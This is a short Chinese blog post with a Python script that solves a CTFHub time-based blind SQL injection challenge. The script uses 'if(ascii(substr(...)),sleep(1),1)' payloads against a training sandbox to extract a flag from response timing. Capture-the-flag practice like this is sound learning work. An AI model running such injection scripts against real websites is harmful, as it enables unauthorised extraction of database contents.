ctfhub的时间注入

ctfhub是个新手入门的好地方
前边的注入会了时间注入还是很简单的，有空合理的补充一下二分法和严密性

import requests
import time
url = "http://challenge-8a39656f3810752a.sandbox.ctfhub.com:10080/?id="
database = ""
for i in range(1,50):
	#print("[%d]" %(i) )
	for j in range(32,127):
		#payload = "if(ascii(substr(database(),1,1))>1,sleep(1.5),1)
		#payload =  "if(ascii(substr(database(),%d,1))=%d,sleep(1),1)" %(i,j )
		payload = "if(ascii(substr((select flag from flag),%d,1))=%d,sleep(1),1)" %(i,j )
		
		start = time.time()
		r = requests.get( url+payload ,timeout=5)
		end_time = time.time()
		
		#print(r.status_code)
		if end_time - start > 1 :
			#print(end_time - start)
			database += chr(j)
			print(database)
			break

posted @ 2020-05-09 23:38 何止(h3zh1) 阅读(279) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

h3zh1

ctfhub的时间注入

公告